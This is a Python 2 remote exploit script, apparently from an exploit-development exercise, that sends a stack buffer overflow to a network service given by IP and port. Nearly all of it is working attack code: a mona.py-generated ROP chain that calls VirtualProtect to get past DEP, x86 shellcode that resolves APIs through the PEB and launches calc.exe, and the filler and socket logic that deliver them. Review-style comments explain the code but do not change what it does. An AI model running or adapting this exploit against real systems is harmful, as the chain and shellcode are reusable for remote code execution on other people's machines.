  1. #!/usr/bin/python
  2.  
  3. import socket, sys, struct
  4. # bp 40190c recv
  5. # bp 401912 after recv
def create_rop_chain():
    """Return the hard-coded gadget list below as one packed byte string.

    Each list entry is emitted in order as a little-endian unsigned
    32-bit word via ``struct.pack('<I', ...)``. The ``''.join`` relies on
    Python 2 semantics, where ``struct.pack`` returns ``str``; under
    Python 3 it returns ``bytes`` and the join raises ``TypeError``.
    The values and the per-entry comments are as produced by the tool
    named in the comment below; the script does not validate them.
    """
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
        0x777d83e4, # POP EAX # RETN [RPCRT4.dll]
        0x779f3030, # ptr to &VirtualProtect() [IAT bcryptPrimitives.dll]
        0x7776f046, # MOV EAX,DWORD PTR DS:[EAX] # RETN [RPCRT4.dll]
        0x76073a50, # XCHG EAX,ESI # RETN [KERNELBASE.dll]
        0x77b646a5, # POP EBP # RETN [ntdll.dll]
        0x760b9ef3, # & jmp esp [KERNELBASE.dll]
        0x77bde810, # POP EBX # RETN [ntdll.dll]
        0x000004B0, # 0x000004B0-> ebx
        0x77b628ac, # POP EDX # RETN [ntdll.dll]
        0x00000040, # 0x00000040-> edx
        0x77bcd8ad, # POP ECX # RETN [ntdll.dll]
        0x76120532, # &Writable location [KERNELBASE.dll]
        0x743bb3b2, # POP EDI # RETN [SspiCli.dll]
        0x77132d41, # RETN (ROP NOP) [KERNEL32.DLL]
        0x7606d63c, # POP EAX # RETN [KERNELBASE.dll]
        0x90909090, # nop
        0x761ff729, # PUSHAD # RETN [sechost.dll]
        0x760b9ef3, # same value as the "& jmp esp" entry above
    ]
    # '_' is used here as an ordinary loop variable, not a discard.
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
  29. # edi rop nop
  30. # esi virtualprotect
  31. # ebp jmp esp
  32. # esp lpAddress
  33. # ebx dwSize
  34. # edx flNewProtect
  35. # ecx lpflOldProtect
  36. # eax 90909090
# Opaque payload bytes appended after the filler below. The script treats
# this purely as a byte string (only its length is read). The ASCII
# fragments ".exe" (\x2E\x65\x78\x65) and "calc" (\x63\x61\x6C\x63) are
# visible inside it; the rest is not interpreted anywhere in this file.
shellcode="\xE8\x00\x00\x00\x00\x5A\x8D\x52\xFB\x89\xE5\x81\xEC\x00\x10\x00\x00\x52\xBB\x8E\xFE\x1F\x4B\xE8\x28\x00\x00\x00\x5A\x55\x52\x89\xC5\x8D\xB2\xE1\x00\x00\x00\x8D\xBA\xE9\x00\x00\x00\xE8\x48\x00\x00\x00\x5A\x5D\x31\xC9\x51\x68\x2E\x65\x78\x65\x68\x63\x61\x6C\x63\x54\xFF\xD0\xFC\x31\xFF\x64\x8B\x3D\x30\x00\x00\x00\x8B\x7F\x0C\x8B\x7F\x14\x8B\x77\x28\x31\xD2\x66\xAD\x84\xC0\x74\x11\x3C\x41\x72\x06\x3C\x5A\x77\x02\x0C\x20\xC1\xC2\x07\x30\xC2\xEB\xE9\x39\xDA\x8B\x47\x10\x8B\x3F\x75\xDB\xC3\x89\xEA\x03\x52\x3C\x8B\x52\x78\x01\xEA\x8B\x5A\x20\x01\xEB\x31\xC9\x57\x56\x8B\x36\x31\xC9\x8B\x3B\x01\xEF\x52\x31\xD2\xC1\xC2\x07\x32\x17\x47\x80\x3F\x00\x75\xF5\x92\x5A\x39\xF0\x74\x0C\x83\xC3\x04\x41\x39\x4A\x18\x75\xDF\x5E\x5F\xC3\x5E\x5F\xAD\x56\x53\x89\xEB\x89\xDE\x03\x5A\x24\x8D\x04\x4B\x0F\xB7\x00\x8D\x04\x86\x03\x42\x1C\x8B\x00\x01\xF0\xAB\x5B\x5E\x83\xC3\x04\x41\x81\x3E\xFF\xFF\x00\x00\x75\xAB\xC3\xAD\x6D\xBF\xE8\xFF\xFF\x00\x00\x01\x00\x00\x00";

# Usage check. Python 2 print statements are used throughout, so the
# script does not run under Python 3.
if len(sys.argv) != 3:
    print "supply IP PORT"
    sys.exit(-1)

# Plain TCP connection to the host and port from the command line. No
# timeout is set, so each recv() below can block indefinitely.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect( (sys.argv[1], int(sys.argv[2])) )

###send
# First exchange: a fixed string terminated by a newline and a NUL byte.
message = "secret\n\x00"
sock.sendall(message)

###receive
# Up to 10000 bytes of the peer's reply, printed verbatim.
data = sock.recv(10000)
print data

###send
rop_chain = create_rop_chain()
#breakpoint="\xcc"
# NOTE(review): ret_addr_s and pad are assigned but never referenced
# again; neither contributes to the `exploit` string built below.
ret_addr_s=struct.pack('L', 0x746b5b5b)
pad="B"*400
# Filler length chosen so that filler + shellcode totals 1040 bytes.
# Despite the name, the filler is "A" bytes, not NOPs. If len(shellcode)
# ever exceeded 1040 this would go negative and "A" * nops_len would be
# the empty string, silently shortening the message.
nops_len = 1040 - len(shellcode)

# Second message layout: filler, then shellcode, then the packed gadget
# list from create_rop_chain().
exploit = "A" * nops_len
exploit += shellcode
exploit += rop_chain

#print("NOPS=%d, shellcode=%d, rop=%d, ret_addr=%s\n" % (nops_len, len(shellcode), len(pad), ret_addr_s ) )
print("Sending %d bytes" %(len(exploit)))

sock.sendall(exploit)

###receive
# Second reply, if any, printed verbatim. The socket is never explicitly
# closed; it is released only when the process exits.
data = sock.recv(10000)
print data